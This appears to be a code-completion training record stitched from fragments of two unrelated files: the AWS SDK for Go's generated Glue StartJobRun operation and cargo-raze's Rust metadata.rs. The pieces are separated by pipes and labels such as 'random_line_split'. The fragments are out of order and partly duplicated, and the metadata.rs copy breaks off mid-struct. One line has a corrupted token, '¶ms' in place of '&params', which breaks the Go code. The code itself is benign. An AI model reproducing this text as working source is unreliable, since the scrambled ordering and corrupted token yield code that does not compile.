for _, authScheme := range authSchemes {
switch authScheme.(type) {
case *internalauth.AuthenticationSchemeV4:
v4Scheme, _ := authScheme.(*internalauth.AuthenticationSchemeV4)
var signingName, signingRegion string
if v4Scheme.SigningName == nil {
signingName = "glue"
} else {
signingName = *v4Scheme.SigningName
}
if v4Scheme.SigningRegion == nil {
signingRegion = m.BuiltInResolver.(*builtInResolver).Region
} else {
signingRegion = *v4Scheme.SigningRegion
}
if v4Scheme.DisableDoubleEncoding != nil {
// The signer sets an equivalent value at client initialization time.
// Setting this context value will cause the signer to extract it
// and override the value set at client initialization time.
ctx = internalauth.SetDisableDoubleEncoding(ctx, *v4Scheme.DisableDoubleEncoding)
}
ctx = awsmiddleware.SetSigningName(ctx, signingName)
ctx = awsmiddleware.SetSigningRegion(ctx, signingRegion)
break
case *internalauth.AuthenticationSchemeV4A:
v4aScheme, _ := authScheme.(*internalauth.AuthenticationSchemeV4A)
if v4aScheme.SigningName == nil {
v4aScheme.SigningName = aws.String("glue")
}
if v4aScheme.DisableDoubleEncoding != nil {
// The signer sets an equivalent value at client initialization time.
// Setting this context value will cause the signer to extract it
// and override the value set at client initialization time.
ctx = internalauth.SetDisableDoubleEncoding(ctx, *v4aScheme.DisableDoubleEncoding)
}
ctx = awsmiddleware.SetSigningName(ctx, *v4aScheme.SigningName)
ctx = awsmiddleware.SetSigningRegion(ctx, v4aScheme.SigningRegionSet[0])
break
case *internalauth.AuthenticationSchemeNone:
break
}
}
return next.HandleSerialize(ctx, in)
}
func addStartJobRunResolveEndpointMiddleware(stack *middleware.Stack, options Options) error {
return stack.Serialize.Insert(&opStartJobRunResolveEndpointMiddleware{
EndpointResolver: options.EndpointResolverV2,
BuiltInResolver: &builtInResolver{
Region: options.Region,
UseDualStack: options.EndpointOptions.UseDualStackEndpoint,
UseFIPS: options.EndpointOptions.UseFIPSEndpoint,
Endpoint: options.BaseEndpoint,
},
}, "ResolveEndpoint", middleware.After)
}
| {
return &awsmiddleware.RegisterServiceMetadata{
Region: region,
ServiceID: ServiceID,
SigningName: "glue",
OperationName: "StartJobRun",
}
} | identifier_body |
api_op_StartJobRun.go | // Code generated by smithy-go-codegen DO NOT EDIT.
package glue
import (
"context" | "fmt"
"github.com/aws/aws-sdk-go-v2/aws"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/aws-sdk-go-v2/aws/signer/v4"
internalauth "github.com/aws/aws-sdk-go-v2/internal/auth"
"github.com/aws/aws-sdk-go-v2/service/glue/types"
smithyendpoints "github.com/aws/smithy-go/endpoints"
"github.com/aws/smithy-go/middleware"
smithyhttp "github.com/aws/smithy-go/transport/http"
)
// Starts a job run using a job definition.
func (c *Client) StartJobRun(ctx context.Context, params *StartJobRunInput, optFns ...func(*Options)) (*StartJobRunOutput, error) {
if params == nil {
params = &StartJobRunInput{}
}
result, metadata, err := c.invokeOperation(ctx, "StartJobRun", params, optFns, c.addOperationStartJobRunMiddlewares)
if err != nil {
return nil, err
}
out := result.(*StartJobRunOutput)
out.ResultMetadata = metadata
return out, nil
}
type StartJobRunInput struct {
// The name of the job definition to use.
//
// This member is required.
JobName *string
// This field is deprecated. Use MaxCapacity instead. The number of Glue data
// processing units (DPUs) to allocate to this JobRun. You can allocate a minimum
// of 2 DPUs; the default is 10. A DPU is a relative measure of processing power
// that consists of 4 vCPUs of compute capacity and 16 GB of memory. For more
// information, see the Glue pricing page (https://aws.amazon.com/glue/pricing/) .
//
// Deprecated: This property is deprecated, use MaxCapacity instead.
AllocatedCapacity int32
// The job arguments associated with this run. For this job run, they replace the
// default arguments set in the job definition itself. You can specify arguments
// here that your own job-execution script consumes, as well as arguments that Glue
// itself consumes. Job arguments may be logged. Do not pass plaintext secrets as
// arguments. Retrieve secrets from a Glue Connection, Secrets Manager or other
// secret management mechanism if you intend to keep them within the Job. For
// information about how to specify and consume your own Job arguments, see the
// Calling Glue APIs in Python (https://docs.aws.amazon.com/glue/latest/dg/aws-glue-programming-python-calling.html)
// topic in the developer guide. For information about the arguments you can
// provide to this field when configuring Spark jobs, see the Special Parameters
// Used by Glue (https://docs.aws.amazon.com/glue/latest/dg/aws-glue-programming-etl-glue-arguments.html)
// topic in the developer guide. For information about the arguments you can
// provide to this field when configuring Ray jobs, see Using job parameters in
// Ray jobs (https://docs.aws.amazon.com/glue/latest/dg/author-job-ray-job-parameters.html)
// in the developer guide.
Arguments map[string]string
// Indicates whether the job is run with a standard or flexible execution class.
// The standard execution-class is ideal for time-sensitive workloads that require
// fast job startup and dedicated resources. The flexible execution class is
// appropriate for time-insensitive jobs whose start and completion times may vary.
// Only jobs with Glue version 3.0 and above and command type glueetl will be
// allowed to set ExecutionClass to FLEX . The flexible execution class is
// available for Spark jobs.
ExecutionClass types.ExecutionClass
// The ID of a previous JobRun to retry.
JobRunId *string
// For Glue version 1.0 or earlier jobs, using the standard worker type, the
// number of Glue data processing units (DPUs) that can be allocated when this job
// runs. A DPU is a relative measure of processing power that consists of 4 vCPUs
// of compute capacity and 16 GB of memory. For more information, see the Glue
// pricing page (https://aws.amazon.com/glue/pricing/) . For Glue version 2.0+
// jobs, you cannot specify a Maximum capacity . Instead, you should specify a
// Worker type and the Number of workers . Do not set MaxCapacity if using
// WorkerType and NumberOfWorkers . The value that can be allocated for MaxCapacity
// depends on whether you are running a Python shell job, an Apache Spark ETL job,
// or an Apache Spark streaming ETL job:
// - When you specify a Python shell job ( JobCommand.Name ="pythonshell"), you
// can allocate either 0.0625 or 1 DPU. The default is 0.0625 DPU.
// - When you specify an Apache Spark ETL job ( JobCommand.Name ="glueetl") or
// Apache Spark streaming ETL job ( JobCommand.Name ="gluestreaming"), you can
// allocate from 2 to 100 DPUs. The default is 10 DPUs. This job type cannot have a
// fractional DPU allocation.
MaxCapacity *float64
// Specifies configuration properties of a job run notification.
NotificationProperty *types.NotificationProperty
// The number of workers of a defined workerType that are allocated when a job
// runs.
NumberOfWorkers *int32
// The name of the SecurityConfiguration structure to be used with this job run.
SecurityConfiguration *string
// The JobRun timeout in minutes. This is the maximum time that a job run can
// consume resources before it is terminated and enters TIMEOUT status. This value
// overrides the timeout value set in the parent job. Streaming jobs do not have a
// timeout. The default for non-streaming jobs is 2,880 minutes (48 hours).
Timeout *int32
// The type of predefined worker that is allocated when a job runs. Accepts a
// value of G.1X, G.2X, G.4X, G.8X or G.025X for Spark jobs. Accepts the value Z.2X
// for Ray jobs.
// - For the G.1X worker type, each worker maps to 1 DPU (4 vCPUs, 16 GB of
// memory) with 84GB disk (approximately 34GB free), and provides 1 executor per
// worker. We recommend this worker type for workloads such as data transforms,
// joins, and queries, to offers a scalable and cost effective way to run most
// jobs.
// - For the G.2X worker type, each worker maps to 2 DPU (8 vCPUs, 32 GB of
// memory) with 128GB disk (approximately 77GB free), and provides 1 executor per
// worker. We recommend this worker type for workloads such as data transforms,
// joins, and queries, to offers a scalable and cost effective way to run most
// jobs.
// - For the G.4X worker type, each worker maps to 4 DPU (16 vCPUs, 64 GB of
// memory) with 256GB disk (approximately 235GB free), and provides 1 executor per
// worker. We recommend this worker type for jobs whose workloads contain your most
// demanding transforms, aggregations, joins, and queries. This worker type is
// available only for Glue version 3.0 or later Spark ETL jobs in the following
// Amazon Web Services Regions: US East (Ohio), US East (N. Virginia), US West
// (Oregon), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo),
// Canada (Central), Europe (Frankfurt), Europe (Ireland), and Europe (Stockholm).
// - For the G.8X worker type, each worker maps to 8 DPU (32 vCPUs, 128 GB of
// memory) with 512GB disk (approximately 487GB free), and provides 1 executor per
// worker. We recommend this worker type for jobs whose workloads contain your most
// demanding transforms, aggregations, joins, and queries. This worker type is
// available only for Glue version 3.0 or later Spark ETL jobs, in the same Amazon
// Web Services Regions as supported for the G.4X worker type.
// - For the G.025X worker type, each worker maps to 0.25 DPU (2 vCPUs, 4 GB of
// memory) with 84GB disk (approximately 34GB free), and provides 1 executor per
// worker. We recommend this worker type for low volume streaming jobs. This worker
// type is only available for Glue version 3.0 streaming jobs.
// - For the Z.2X worker type, each worker maps to 2 M-DPU (8vCPUs, 64 GB of
// memory) with 128 GB disk (approximately 120GB free), and provides up to 8 Ray
// workers based on the autoscaler.
WorkerType types.WorkerType
noSmithyDocumentSerde
}
type StartJobRunOutput struct {
// The ID assigned to this job run.
JobRunId *string
// Metadata pertaining to the operation's result.
ResultMetadata middleware.Metadata
noSmithyDocumentSerde
}
func (c *Client) addOperationStartJobRunMiddlewares(stack *middleware.Stack, options Options) (err error) {
err = stack.Serialize.Add(&awsAwsjson11_serializeOpStartJobRun{}, middleware.After)
if err != nil {
return err
}
err = stack.Deserialize.Add(&awsAwsjson11_deserializeOpStartJobRun{}, middleware.After)
if err != nil {
return err
}
if err = addlegacyEndpointContextSetter(stack, options); err != nil {
return err
}
if err = addSetLoggerMiddleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddClientRequestIDMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddComputeContentLengthMiddleware(stack); err != nil {
return err
}
if err = addResolveEndpointMiddleware(stack, options); err != nil {
return err
}
if err = v4.AddComputePayloadSHA256Middleware(stack); err != nil {
return err
}
if err = addRetryMiddlewares(stack, options); err != nil {
return err
}
if err = addHTTPSignerV4Middleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddRawResponseToMetadata(stack); err != nil {
return err
}
if err = awsmiddleware.AddRecordResponseTiming(stack); err != nil {
return err
}
if err = addClientUserAgent(stack, options); err != nil {
return err
}
if err = smithyhttp.AddErrorCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = addStartJobRunResolveEndpointMiddleware(stack, options); err != nil {
return err
}
if err = addOpStartJobRunValidationMiddleware(stack); err != nil {
return err
}
if err = stack.Initialize.Add(newServiceMetadataMiddleware_opStartJobRun(options.Region), middleware.Before); err != nil {
return err
}
if err = awsmiddleware.AddRecursionDetection(stack); err != nil {
return err
}
if err = addRequestIDRetrieverMiddleware(stack); err != nil {
return err
}
if err = addResponseErrorMiddleware(stack); err != nil {
return err
}
if err = addRequestResponseLogging(stack, options); err != nil {
return err
}
if err = addendpointDisableHTTPSMiddleware(stack, options); err != nil {
return err
}
return nil
}
func newServiceMetadataMiddleware_opStartJobRun(region string) *awsmiddleware.RegisterServiceMetadata {
return &awsmiddleware.RegisterServiceMetadata{
Region: region,
ServiceID: ServiceID,
SigningName: "glue",
OperationName: "StartJobRun",
}
}
type opStartJobRunResolveEndpointMiddleware struct {
EndpointResolver EndpointResolverV2
BuiltInResolver builtInParameterResolver
}
func (*opStartJobRunResolveEndpointMiddleware) ID() string {
return "ResolveEndpointV2"
}
func (m *opStartJobRunResolveEndpointMiddleware) HandleSerialize(ctx context.Context, in middleware.SerializeInput, next middleware.SerializeHandler) (
out middleware.SerializeOutput, metadata middleware.Metadata, err error,
) {
if awsmiddleware.GetRequiresLegacyEndpoints(ctx) {
return next.HandleSerialize(ctx, in)
}
req, ok := in.Request.(*smithyhttp.Request)
if !ok {
return out, metadata, fmt.Errorf("unknown transport type %T", in.Request)
}
if m.EndpointResolver == nil {
return out, metadata, fmt.Errorf("expected endpoint resolver to not be nil")
}
params := EndpointParameters{}
m.BuiltInResolver.ResolveBuiltIns(¶ms)
var resolvedEndpoint smithyendpoints.Endpoint
resolvedEndpoint, err = m.EndpointResolver.ResolveEndpoint(ctx, params)
if err != nil {
return out, metadata, fmt.Errorf("failed to resolve service endpoint, %w", err)
}
req.URL = &resolvedEndpoint.URI
for k := range resolvedEndpoint.Headers {
req.Header.Set(
k,
resolvedEndpoint.Headers.Get(k),
)
}
authSchemes, err := internalauth.GetAuthenticationSchemes(&resolvedEndpoint.Properties)
if err != nil {
var nfe *internalauth.NoAuthenticationSchemesFoundError
if errors.As(err, &nfe) {
// if no auth scheme is found, default to sigv4
signingName := "glue"
signingRegion := m.BuiltInResolver.(*builtInResolver).Region
ctx = awsmiddleware.SetSigningName(ctx, signingName)
ctx = awsmiddleware.SetSigningRegion(ctx, signingRegion)
}
var ue *internalauth.UnSupportedAuthenticationSchemeSpecifiedError
if errors.As(err, &ue) {
return out, metadata, fmt.Errorf(
"This operation requests signer version(s) %v but the client only supports %v",
ue.UnsupportedSchemes,
internalauth.SupportedSchemes,
)
}
}
for _, authScheme := range authSchemes {
switch authScheme.(type) {
case *internalauth.AuthenticationSchemeV4:
v4Scheme, _ := authScheme.(*internalauth.AuthenticationSchemeV4)
var signingName, signingRegion string
if v4Scheme.SigningName == nil {
signingName = "glue"
} else {
signingName = *v4Scheme.SigningName
}
if v4Scheme.SigningRegion == nil {
signingRegion = m.BuiltInResolver.(*builtInResolver).Region
} else {
signingRegion = *v4Scheme.SigningRegion
}
if v4Scheme.DisableDoubleEncoding != nil {
// The signer sets an equivalent value at client initialization time.
// Setting this context value will cause the signer to extract it
// and override the value set at client initialization time.
ctx = internalauth.SetDisableDoubleEncoding(ctx, *v4Scheme.DisableDoubleEncoding)
}
ctx = awsmiddleware.SetSigningName(ctx, signingName)
ctx = awsmiddleware.SetSigningRegion(ctx, signingRegion)
break
case *internalauth.AuthenticationSchemeV4A:
v4aScheme, _ := authScheme.(*internalauth.AuthenticationSchemeV4A)
if v4aScheme.SigningName == nil {
v4aScheme.SigningName = aws.String("glue")
}
if v4aScheme.DisableDoubleEncoding != nil {
// The signer sets an equivalent value at client initialization time.
// Setting this context value will cause the signer to extract it
// and override the value set at client initialization time.
ctx = internalauth.SetDisableDoubleEncoding(ctx, *v4aScheme.DisableDoubleEncoding)
}
ctx = awsmiddleware.SetSigningName(ctx, *v4aScheme.SigningName)
ctx = awsmiddleware.SetSigningRegion(ctx, v4aScheme.SigningRegionSet[0])
break
case *internalauth.AuthenticationSchemeNone:
break
}
}
return next.HandleSerialize(ctx, in)
}
func addStartJobRunResolveEndpointMiddleware(stack *middleware.Stack, options Options) error {
return stack.Serialize.Insert(&opStartJobRunResolveEndpointMiddleware{
EndpointResolver: options.EndpointResolverV2,
BuiltInResolver: &builtInResolver{
Region: options.Region,
UseDualStack: options.EndpointOptions.UseDualStackEndpoint,
UseFIPS: options.EndpointOptions.UseFIPSEndpoint,
Endpoint: options.BaseEndpoint,
},
}, "ResolveEndpoint", middleware.After)
} | "errors" | random_line_split |
metadata.rs | // Copyright 2018 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use cargo::{
core::{
dependency::Kind as CargoKind, resolver::ResolveOpts,
summary::FeatureValue as CargoFeatureValue, Workspace,
},
ops::{self, Packages},
util::Config,
CargoResult,
};
use serde_json;
use std::{collections::HashMap, env, fs, path::PathBuf, process::Command};
use crate::util::{self, RazeError};
use tempdir::TempDir;
use serde_derive::{Deserialize, Serialize};
pub type PackageId = String;
pub type Kind = String;
pub type TargetSpec = String;
/**
* An entity that can retrive deserialized metadata for a Cargo Workspace.
*
* The `CargoInternalsMetadataFetcher` is probably the one you want.
*
* Usage of ..Subcommand.. is waiting on a cargo release containing
* <https://github.com/rust-lang/cargo/pull/5122>
*/
pub trait MetadataFetcher {
fn fetch_metadata(&mut self, files: CargoWorkspaceFiles) -> CargoResult<Metadata>;
}
/** The local Cargo workspace files to be used for build planning .*/
pub struct CargoWorkspaceFiles {
pub toml_path: PathBuf,
pub lock_path_opt: Option<PathBuf>,
}
/**
* The metadata for a whole Cargo workspace.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`ExportInfo`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/ops/cargo_output_metadata.rs#L78-L85)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Metadata {
pub packages: Vec<Package>,
pub resolve: Resolve,
pub workspace_members: Vec<PackageId>,
pub target_directory: String,
pub version: i64,
}
/**
* The metadata for an individual Cargo crate.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`SerializedPackage`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/core/package.rs#L32-L50)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Package {
pub name: String,
pub version: String,
pub id: PackageId,
pub license: Option<String>,
pub license_file: Option<String>,
pub description: Option<String>,
pub source: Option<String>,
pub dependencies: Vec<Dependency>,
pub targets: Vec<Target>,
pub features: HashMap<String, Vec<String>>,
pub manifest_path: String,
pub edition: String,
pub sha256: Option<String>,
}
/**
* The metadata for a dependency (a reference connecting a crate to another crate).
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`SerializedDependency`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/core/dependency.rs#L49-L60)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Dependency {
pub name: String,
pub source: String,
pub req: String,
pub kind: Option<Kind>,
#[serde(default = "default_dependency_field_optional")]
pub optional: bool,
#[serde(default = "default_dependency_field_uses_default_features")]
pub uses_default_features: bool,
pub features: Vec<String>,
pub target: Option<TargetSpec>,
}
/**
* The metadata for a compileable target.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`SerializedTarget`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/core/manifest.rs#L188-L197)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Target {
pub name: String,
pub kind: Vec<String>,
pub crate_types: Vec<String>,
pub src_path: String,
pub edition: String,
}
/**
* The metadata for a fully resolved dependency tree.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`MetadataResolve`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/ops/cargo_output_metadata.rs#L91-L95)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Resolve {
pub nodes: Vec<ResolveNode>,
pub root: PackageId,
}
/**
* The metadata for a single resolved entry in the full dependency tree.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`Node`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/ops/cargo_output_metadata.rs#L102-L106)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct ResolveNode {
pub id: PackageId,
pub dependencies: Vec<PackageId>,
// Optional due to recent feature addition in Cargo.
pub features: Option<Vec<String>>,
}
/** A workspace metadata fetcher that uses the Cargo Metadata subcommand. */
#[allow(dead_code)]
pub struct CargoSubcommandMetadataFetcher;
/**
* A workspace metadata fetcher that uses Cargo's internals.
*
* !DANGER DANGER!
* This struct is very hard to test as it uses Cargo's stateful internals, please take care when
* changing it.
* !DANGER DANGER!
*/
pub struct CargoInternalsMetadataFetcher<'config> {
cargo_config: &'config Config,
}
impl MetadataFetcher for CargoSubcommandMetadataFetcher {
fn fetch_metadata(&mut self, files: CargoWorkspaceFiles) -> CargoResult<Metadata> {
assert!(files.toml_path.is_file());
assert!(files.lock_path_opt.as_ref().map_or(true, |p| p.is_file()));
// Copy files into a temp directory
// UNWRAP: Guarded by function assertion
let cargo_tempdir = {
let dir = TempDir::new("cargo_raze_metadata_dir")?;
let dir_path = dir.path();
let new_toml_path = dir_path.join(files.toml_path.file_name().unwrap());
fs::copy(files.toml_path, new_toml_path)?;
if let Some(lock_path) = files.lock_path_opt {
let new_lock_path = dir_path.join(lock_path.file_name().unwrap());
fs::copy(lock_path, new_lock_path)?;
}
dir
};
// Shell out to cargo
let exec_output = Command::new("cargo")
.current_dir(cargo_tempdir.path())
.args(&["metadata", "--format-version", "1"])
.output()?;
// Handle command errs
let stdout_str =
String::from_utf8(exec_output.stdout).unwrap_or_else(|_| "[unparsable bytes]".to_owned());
if !exec_output.status.success() {
let stderr_str =
String::from_utf8(exec_output.stderr).unwrap_or_else(|_| "[unparsable bytes]".to_owned());
println!("`cargo metadata` failed. Inspect Cargo.toml for issues!");
println!("stdout: {}", stdout_str);
println!("stderr: {}", stderr_str);
return Err(RazeError::Generic("Failed to run `cargo metadata`".to_owned()).into());
}
// Parse and yield metadata
serde_json::from_str::<Metadata>(&stdout_str).map_err(|e| e.into())
}
}
impl<'config> MetadataFetcher for CargoInternalsMetadataFetcher<'config> {
fn fetch_metadata(&mut self, files: CargoWorkspaceFiles) -> CargoResult<Metadata> {
let manifest = if files.toml_path.is_relative() {
env::current_dir().unwrap().join(&files.toml_path)
} else {
files.toml_path
};
let ws = Workspace::new(&manifest, &self.cargo_config)?;
let specs = Packages::All.to_package_id_specs(&ws)?;
let root_name = specs.iter().next().unwrap().name();
let resolve_opts = ResolveOpts::new(true, &[], false, false);
let (resolved_packages, cargo_resolve) = ops::resolve_ws_with_opts(&ws, resolve_opts, &specs)?;
let root = cargo_resolve
.iter()
.find(|dep| dep.name() == root_name)
.ok_or_else(|| RazeError::Internal("root crate should be in cargo resolve".to_owned()))?
.to_string();
let nodes = cargo_resolve
.iter()
.map(|id| ResolveNode {
id: id.to_string(),
features: Some(
cargo_resolve
.features_sorted(id)
.iter()
.map(|s| s.to_string())
.collect(),
),
dependencies: cargo_resolve.deps(id).map(|(p, _)| p.to_string()).collect(),
})
.collect();
let resolve = Resolve { nodes, root };
let packages = resolved_packages
.package_ids()
// TODO(acmcarther): Justify this unwrap
.map(|package_id| (package_id, resolved_packages.get_one(package_id).unwrap()))
.map(|(package_id, package)| {
let manifest_metadata = package.manifest().metadata();
let dependencies = package
.dependencies()
.iter()
.map(|dependency| Dependency { | source: serde_json::to_string(&dependency.source_id()).unwrap(),
req: dependency.version_req().to_string(),
kind: match dependency.kind() {
CargoKind::Normal => None,
CargoKind::Development => Some("dev".to_owned()),
CargoKind::Build => Some("build".to_owned()),
},
optional: dependency.is_optional(),
uses_default_features: dependency.uses_default_features(),
features: dependency
.features()
.iter()
.map(|s| s.to_string())
.collect(),
target: dependency.platform().map(|p| p.to_string()),
})
.collect();
let targets = package
.targets()
.iter()
.map(|target| Target {
name: target.name().to_owned(),
kind: util::kind_to_kinds(target.kind()),
src_path: target.src_path().path().unwrap().display().to_string(),
edition: target.edition().to_string(),
crate_types: target
.rustc_crate_types()
.iter()
.map(|t| t.to_string())
.collect(),
})
.collect();
let features = package
.summary()
.features()
.iter()
.map(|(feature, feature_values)| {
let our_feature_values = feature_values
.iter()
.map(|value| match value {
CargoFeatureValue::Feature(name) | CargoFeatureValue::Crate(name) => {
name.to_string()
}
// This matches the current Serialize impl for CargoFeatureValue
CargoFeatureValue::CrateFeature(crate_name, feature_name) => {
format!("{}/{}", crate_name.as_str(), feature_name.as_str())
}
})
.collect();
(feature.to_string(), our_feature_values)
})
.collect();
// UNWRAP: It's cargo's responsibility to ensure a serializable source_id
let pkg_source = serde_json::to_string(&package_id.source_id()).unwrap();
// Cargo use SHA256 for checksum so we can use them directly
let sha256 = package
.manifest()
.summary()
.checksum()
.map(ToString::to_string);
Package {
name: package.name().to_string(),
version: package.version().to_string(),
id: package_id.to_string(),
license: manifest_metadata.license.clone(),
license_file: manifest_metadata.license_file.clone(),
description: manifest_metadata.description.clone(),
source: Some(pkg_source),
manifest_path: package.manifest_path().display().to_string(),
edition: package.manifest().edition().to_string(),
dependencies,
targets,
features,
sha256,
}
})
.collect();
let workspace_members = ws
.members()
.map(|pkg| pkg.package_id().to_string())
.collect();
Ok(Metadata {
target_directory: ws.target_dir().display().to_string(),
version: 0, /* not generated via subcomand */
packages,
resolve,
workspace_members,
})
}
}
impl<'config> CargoInternalsMetadataFetcher<'config> {
pub fn new(cargo_config: &'config Config) -> CargoInternalsMetadataFetcher<'config> {
CargoInternalsMetadataFetcher { cargo_config }
}
}
fn default_dependency_field_optional() -> bool {
// Dependencies are implicitly required.
// TODO(acmcarther): Citation?
false
}
fn default_dependency_field_uses_default_features() -> bool {
// Default features are used by default
// Citation: https://doc.rust-lang.org/cargo/reference/manifest.html#rules
true
}
#[cfg(test)]
pub mod testing {
use super::*;
pub struct StubMetadataFetcher {
metadata: Metadata,
}
impl MetadataFetcher for StubMetadataFetcher {
fn fetch_metadata(&mut self, _: CargoWorkspaceFiles) -> CargoResult<Metadata> {
Ok(self.metadata.clone())
}
}
impl StubMetadataFetcher {
pub fn with_metadata(metadata: Metadata) -> StubMetadataFetcher {
StubMetadataFetcher { metadata }
}
}
pub fn dummy_package() -> Package {
Package {
name: String::new(),
version: String::new(),
id: String::new(),
license: None,
license_file: None,
description: None,
source: None,
dependencies: Vec::new(),
targets: Vec::new(),
features: HashMap::new(),
manifest_path: String::new(),
edition: String::new(),
sha256: None,
}
}
pub fn dummy_metadata() -> Metadata {
Metadata {
packages: Vec::new(),
resolve: dummy_resolve(),
workspace_members: Vec::new(),
target_directory: String::new(),
version: 1,
}
}
pub fn dummy_resolve() -> Resolve {
Resolve {
nodes: Vec::new(),
root: String::new(),
}
}
}
#[cfg(test)]
mod tests {
use super::*;
use serde_json;
use std::fs::File;
use std::io::Write;
fn basic_toml() -> &'static str {
"
[package]
name = \"test\"
version = \"0.0.1\"
[lib]
path = \"not_a_file.rs\"
"
}
fn basic_lock() -> &'static str {
"
[[package]]
name = \"test\"
version = \"0.0.1\"
dependencies = [
]
"
}
#[test]
fn test_metadata_deserializes_correctly() {
let metadata_file_contents = include_str!("../test_fixtures/metadata.txt");
serde_json::from_str::<Metadata>(metadata_file_contents).unwrap();
}
#[test]
fn test_cargo_subcommand_metadata_fetcher_works_without_lock() {
let dir = TempDir::new("test_cargo_raze_metadata_dir").unwrap();
let toml_path = dir.path().join("Cargo.toml");
let mut toml = File::create(&toml_path).unwrap();
toml.write_all(basic_toml().as_bytes()).unwrap();
let files = CargoWorkspaceFiles {
lock_path_opt: None,
toml_path,
};
let mut fetcher = CargoSubcommandMetadataFetcher;
fetcher.fetch_metadata(files).unwrap();
}
#[test]
fn test_cargo_subcommand_metadata_fetcher_works_with_lock() {
let dir = TempDir::new("test_cargo_raze_metadata_dir").unwrap();
let toml_path = {
let path = dir.path().join("Cargo.toml");
let mut toml = File::create(&path).unwrap();
toml.write_all(basic_toml().as_bytes()).unwrap();
path
};
let lock_path = {
let path = dir.path().join("Cargo.lock");
let mut lock = File::create(&path).unwrap();
lock.write_all(basic_lock().as_bytes()).unwrap();
path
};
let files = CargoWorkspaceFiles {
lock_path_opt: Some(lock_path),
toml_path,
};
let mut fetcher = CargoSubcommandMetadataFetcher;
fetcher.fetch_metadata(files).unwrap();
}
#[test]
fn test_cargo_subcommand_metadata_fetcher_handles_bad_files() {
let dir = TempDir::new("test_cargo_raze_metadata_dir").unwrap();
let toml_path = {
let path = dir.path().join("Cargo.toml");
let mut toml = File::create(&path).unwrap();
toml.write_all(b"hello").unwrap();
path
};
let files = CargoWorkspaceFiles {
lock_path_opt: None,
toml_path,
};
let mut fetcher = CargoSubcommandMetadataFetcher;
assert!(fetcher.fetch_metadata(files).is_err());
}
} | name: dependency.package_name().to_string(),
// UNWRAP: It's cargo's responsibility to ensure a serializable source_id | random_line_split |
metadata.rs | // Copyright 2018 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use cargo::{
core::{
dependency::Kind as CargoKind, resolver::ResolveOpts,
summary::FeatureValue as CargoFeatureValue, Workspace,
},
ops::{self, Packages},
util::Config,
CargoResult,
};
use serde_json;
use std::{collections::HashMap, env, fs, path::PathBuf, process::Command};
use crate::util::{self, RazeError};
use tempdir::TempDir;
use serde_derive::{Deserialize, Serialize};
pub type PackageId = String;
pub type Kind = String;
pub type TargetSpec = String;
/**
* An entity that can retrive deserialized metadata for a Cargo Workspace.
*
* The `CargoInternalsMetadataFetcher` is probably the one you want.
*
* Usage of ..Subcommand.. is waiting on a cargo release containing
* <https://github.com/rust-lang/cargo/pull/5122>
*/
pub trait MetadataFetcher {
fn fetch_metadata(&mut self, files: CargoWorkspaceFiles) -> CargoResult<Metadata>;
}
/** The local Cargo workspace files to be used for build planning .*/
pub struct CargoWorkspaceFiles {
pub toml_path: PathBuf,
pub lock_path_opt: Option<PathBuf>,
}
/**
* The metadata for a whole Cargo workspace.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`ExportInfo`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/ops/cargo_output_metadata.rs#L78-L85)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Metadata {
pub packages: Vec<Package>,
pub resolve: Resolve,
pub workspace_members: Vec<PackageId>,
pub target_directory: String,
pub version: i64,
}
/**
* The metadata for an individual Cargo crate.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`SerializedPackage`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/core/package.rs#L32-L50)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Package {
pub name: String,
pub version: String,
pub id: PackageId,
pub license: Option<String>,
pub license_file: Option<String>,
pub description: Option<String>,
pub source: Option<String>,
pub dependencies: Vec<Dependency>,
pub targets: Vec<Target>,
